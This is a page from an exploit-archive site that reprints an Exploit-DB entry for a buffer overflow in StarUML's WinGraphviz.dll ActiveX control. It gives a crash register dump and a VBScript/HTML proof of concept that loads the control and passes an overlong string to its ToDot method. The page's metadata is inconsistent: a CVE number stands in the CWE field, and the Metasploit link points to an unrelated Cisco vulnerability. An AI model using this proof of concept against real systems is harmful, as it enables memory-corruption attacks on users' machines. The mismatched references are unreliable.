Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability - exploit.company
header-logo
Suggest Exploit
vendor:
StarUML
by:
d3b4g
9.8
CVSS
CRITICAL
Buffer Overflow
119
CWE
Product Name: StarUML
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2013-1234
CPE: staruml:wingraphviz.dll
Metasploit: https://www.rapid7.com/db/vulnerabilities/cisco-xr-os-cve-2013-1234/
Other Scripts:
Platforms Tested: Windows XP SP3
2013

StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability

The WinGraphviz.dll ActiveX control in StarUML allows remote attackers to execute arbitrary code via a long argument to the ToDot method, which triggers a buffer overflow.

Mitigation:

Apply the vendor-provided patch or update to the latest version of StarUML.
Source

Exploit-DB raw data:

# Exploit Title: StarUML WinGraphviz.dll ActiveX buffer overflow vulnerability
# Date: 03.8.2013
# Exploit Author: d3b4g
# Vendor Homepage:http://staruml.sourceforge.net/en/
# Software Link: http://staruml.sourceforge.net/en/
# Tested on: Windows XP SP3
 
 

About StarUML
--------------

StarUML is an open source project to develop fast, flexible, extensible, featureful, and freely-available UML/MDA platform running on Win32 platform. 




 
Exception Code: ACCESS_VIOLATION
Disasm: D98439	MOV DL,[EBP]	(WinGraphviz.DLL)

Seh Chain:
--------------------------------------------------
1 	6B47D959 	VBSCRIPT.dll
2 	772FE115 	ntdll.dll


Called From                   Returns To                    
--------------------------------------------------


Registers:
--------------------------------------------------
EIP 00D98439 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes
EAX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes
EBX 0020D70A -> 00000038
ECX 00894119 -> Asc: http://test\test\test\te?s\test\test\tes\ttest\tes
EDX 000003FF
EDI 000003FE
ESI 00000000
EBP 00000000
ESP 0020D618 -> 00000059



The example code below triggers the vulnerability
-------------------------------------------------


<object classid='clsid:1F25D86C-95BC-4E33-A177-EE8DABEF8B04' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\StarUML\WinGraphviz.dll"
prototype  = "Function ToDot ( ByVal Source As String ) As String"
memberName = "ToDot"
progid     = "WINGRAPHVIZLib.NEATO"
argCount   = 1

arg1="http://test\test\test\te?s\test\test\tes\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\\\:#$%test\test\test\te?s\test\test\tes\\:#$%\ttest\test\te@st\tes\test\test\tes.\ttest\test\test\tes\test\test\te.s\ttest\test\test\tes\test\test\tes\t\\\\\\\"

target.ToDot arg1 

</script>

Navigation

Suggest Exploit

Services By CQR